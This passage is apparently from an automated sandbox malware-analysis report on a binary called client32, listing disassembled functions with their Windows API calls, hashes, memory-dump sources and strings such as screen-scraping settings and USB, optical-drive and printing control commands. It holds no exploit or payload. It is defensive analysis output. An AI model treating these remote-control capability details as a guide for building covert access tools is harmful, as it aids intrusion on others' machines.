                                                                                                                                                                • Opcode ID: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
                                                                                                                                                                • Instruction ID: 68f8b224c7beedd47666692ff363fa6bc3684c9dbb57027410f782db2506f70a
                                                                                                                                                                • Opcode Fuzzy Hash: dd4de2a7fc9d8cd5af608a89b0c8565785138ad2200bde7dfaaacefb5c936fd0
                                                                                                                                                                • Instruction Fuzzy Hash: 3391D0B5E002299FDB14CF64DC80BEEF7F5AF89308F1441A9D9599B640EB30AE45CB91
                                                                                                                                                                Function 110535D6 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 235COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick_malloc_memsetwsprintf
                                                                                                                                                                • String ID: %s|%s$Channel$Client$Delay$NameLookup$_License$serial_no
                                                                                                                                                                • API String ID: 476529905-1572471466
                                                                                                                                                                • Opcode ID: d5ea3294f5018c1b5af9269d5e3c6f9db3afc0f870584c41fa064c38045f5e7d
                                                                                                                                                                • Instruction ID: 7fe4dc2c9c8283dcb924a9d036735a693b6ae83b932d1ebb9d9659e593a33053
                                                                                                                                                                • Opcode Fuzzy Hash: d5ea3294f5018c1b5af9269d5e3c6f9db3afc0f870584c41fa064c38045f5e7d
                                                                                                                                                                • Instruction Fuzzy Hash: 68816BB5E0429B5FDB55CB74CC44BAEBBF5AF45308F1442E8D859EB281DA32E901CB50
                                                                                                                                                                Function 110B3520 Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 228COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,View,limitcolorbits,00000000,00000000,59FD48C0,111F00F8,111E5C98,?), ref: 110B3594
                                                                                                                                                                • UnionRect.USER32(?,?,?), ref: 110B3642
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 110B37DD
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$EnterLeaveRectUnion__wcstoi64
                                                                                                                                                                • String ID: 8$Client$ScrapeBandwidth$ScrapeBandwidthPeriod$ScrapeBusyDelay$ScrapeNotBusyDelay$ScrapeSkipDelay$View$d$limitcolorbits
                                                                                                                                                                • API String ID: 3518726166-774679399
                                                                                                                                                                • Opcode ID: 0507bcf6a5bfb235a752924e3a90bf095b586a4feb6a764fbd151a6487f36d15
                                                                                                                                                                • Instruction ID: 5c973c881439576bbc97280a0c87cfab299b34d5c0027cf4f030de1918296fe0
                                                                                                                                                                • Opcode Fuzzy Hash: 0507bcf6a5bfb235a752924e3a90bf095b586a4feb6a764fbd151a6487f36d15
                                                                                                                                                                • Instruction Fuzzy Hash: E5911778E04219AFDB54CFA5C980BADFBF1FB48704F20816AE815AB380D735A941CF58
                                                                                                                                                                Function 11041790 Relevance: 22.7, APIs: 1, Strings: 14, Instructions: 181sleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • Sleep.KERNEL32(000005DC,?,_License,Product,0000000A,00000000), ref: 110417DB
                                                                                                                                                                  • Part of subcall function 1105DE40: __itow.LIBCMT ref: 1105DE65
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep__itow__wcstoi64
                                                                                                                                                                • String ID: **** Reset expire flag$Client$DisableAudio$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DoNewLic received (VistaUI=%d)$Expired$IsFree %d, was free %d$Product$Reset JoinClass, ReplayMenu, RequestHelp, Journal and Audio, ts=%d, vui=%d, config %x$_License
                                                                                                                                                                • API String ID: 4129630603-1903392697
                                                                                                                                                                • Opcode ID: 5f6bc18adebceb937a44eededaee0be923c04fdf4a2cc5f9b1e78570ee760fdf
                                                                                                                                                                • Instruction ID: c697aa05869d8dcbb06e6fa88acd42bec9afcae05c4931e8126933406671653c
                                                                                                                                                                • Opcode Fuzzy Hash: 5f6bc18adebceb937a44eededaee0be923c04fdf4a2cc5f9b1e78570ee760fdf
                                                                                                                                                                • Instruction Fuzzy Hash: 30515A39B8011A7BE751D696DC91FEEFB55AF90B4CFA48015F9293B2C1C7607A01C3A2
                                                                                                                                                                Function 1102310A Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 363windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1115ADD0: IsIconic.USER32(?), ref: 1115AE77
                                                                                                                                                                  • Part of subcall function 1115ADD0: ShowWindow.USER32(?,00000009), ref: 1115AE87
                                                                                                                                                                  • Part of subcall function 1115ADD0: BringWindowToTop.USER32(?), ref: 1115AE91
                                                                                                                                                                • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102324D
                                                                                                                                                                • ShowWindow.USER32(?,00000003), ref: 110232D1
                                                                                                                                                                • LoadMenuA.USER32(00000000,000013A3), ref: 110233FB
                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 11023409
                                                                                                                                                                • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023429
                                                                                                                                                                • GetDlgItem.USER32(?,000013B2), ref: 1102343C
                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 11023443
                                                                                                                                                                • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023499
                                                                                                                                                                • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 110234A3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                                                                                                • String ID: AddToJournal$Chat
                                                                                                                                                                • API String ID: 693070851-2976406578
                                                                                                                                                                • Opcode ID: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                                                                                                • Instruction ID: 337dba7d0f02a97e7c7211def3ec221287211942730252afe18814347e7ecccc
                                                                                                                                                                • Opcode Fuzzy Hash: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                                                                                                • Instruction Fuzzy Hash: 87A1F178B04616ABDB09DF74CC85FAEB3E5AB88704F504519EA26DF2C0CF74B9408B65
                                                                                                                                                                Function 11027270 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 136threadwindowsleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 110272B4
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000001F4), ref: 11027323
                                                                                                                                                                • PostMessageA.USER32(000802A6,00000501,00000000,00000000), ref: 11027340
                                                                                                                                                                • SetEvent.KERNEL32(0000029C), ref: 11027351
                                                                                                                                                                • Sleep.KERNEL32(00000032), ref: 11027359
                                                                                                                                                                • PostMessageA.USER32(000802A6,00000800,00000000,00000000), ref: 1102738E
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 110273BA
                                                                                                                                                                • GetThreadDesktop.USER32(00000000), ref: 110273C1
                                                                                                                                                                • SetThreadDesktop.USER32(00000000), ref: 110273CA
                                                                                                                                                                • CloseDesktop.USER32(00000000), ref: 110273D5
                                                                                                                                                                • CloseHandle.KERNEL32(000003FC), ref: 11027415
                                                                                                                                                                  • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                                                                                                  • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                                                                                                  • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                                                                                                  • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                                                                                                  • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Thread$CriticalDesktopEventSection$CloseCreateCurrentInitializeMessagePost$EnterHandleHookMultipleObjectsSleepUnhookWaitWindows_malloc_memsetwsprintf
                                                                                                                                                                • String ID: Async
                                                                                                                                                                • API String ID: 3276504616-2933828738
                                                                                                                                                                • Opcode ID: 7f34267c0eb402a5cecabe7481cb594ff7fa9432527a27f32e6b0a7f9cc990e4
                                                                                                                                                                • Instruction ID: b4c20aaf8d895fc577ef80b9cbd2db14a62b6b62bbca8aebe14e383436c97cb7
                                                                                                                                                                • Opcode Fuzzy Hash: 7f34267c0eb402a5cecabe7481cb594ff7fa9432527a27f32e6b0a7f9cc990e4
                                                                                                                                                                • Instruction Fuzzy Hash: 2641A174A056159FEB05DFF8C886BAEB7A4FB54718F804138E925DB6C4EB70B800CB51
                                                                                                                                                                Function 11105340 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 84fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1110534D
                                                                                                                                                                • EnterCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105356
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1110535C
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1110538E
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105397
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053B8
                                                                                                                                                                • WriteFile.KERNEL32(00000000,1118C583,?,?,00000000,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF), ref: 111053D0
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053DD
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 111053EC
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053F5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$CountTick$Leave$Enter$FileWrite
                                                                                                                                                                • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                                                                                                • API String ID: 831250470-625438208
                                                                                                                                                                • Opcode ID: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                                                                                                • Instruction ID: 510883743b079e8f18b7a04972f4ca77f6f871929db96d85a9feff413df15827
                                                                                                                                                                • Opcode Fuzzy Hash: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                                                                                                • Instruction Fuzzy Hash: F521F37AE10228ABDB009F759CC89AEFBADEB8972DB551075FC15CB204D6609C04CBA0
                                                                                                                                                                Function 1100D200 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf
                                                                                                                                                                • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                                                                                                • API String ID: 2111968516-2092292787
                                                                                                                                                                • Opcode ID: 68bb8bbd715fdcfb00972525606c57017de8997db1f0824372bcab7740fe05b1
                                                                                                                                                                • Instruction ID: d9a7d6ebd96fccb3ef7d6a30ae0c52648c54e2eaa592bb8290d406d227b44d1e
                                                                                                                                                                • Opcode Fuzzy Hash: 68bb8bbd715fdcfb00972525606c57017de8997db1f0824372bcab7740fe05b1
                                                                                                                                                                • Instruction Fuzzy Hash: B7F0623269520C47BA8087EC784053EF78D739217D7C88093F4ACFAF20E916DCA0A1A9
                                                                                                                                                                Function 1103D900 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 146COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • RESUMEPRINTINGPRINTER=*FILETYPES=, xrefs: 1103D9E2
                                                                                                                                                                • IsA(), xrefs: 1103DA04
                                                                                                                                                                • SETUSBMASSSTORAGEACCESS, xrefs: 1103D963
                                                                                                                                                                • BLOCKPRINTING, xrefs: 1103D9BD
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103D9FF
                                                                                                                                                                • SETOPTICALDRIVEACCESS, xrefs: 1103D994
                                                                                                                                                                • SETUSBMASSSTORAGEACCESSACCESSMODES=%u, xrefs: 1103D986
                                                                                                                                                                • BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1, xrefs: 1103D9DB
                                                                                                                                                                • SETOPTICALDRIVEACCESSACCESSMODES=%u, xrefs: 1103D9AF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _malloc_memmove
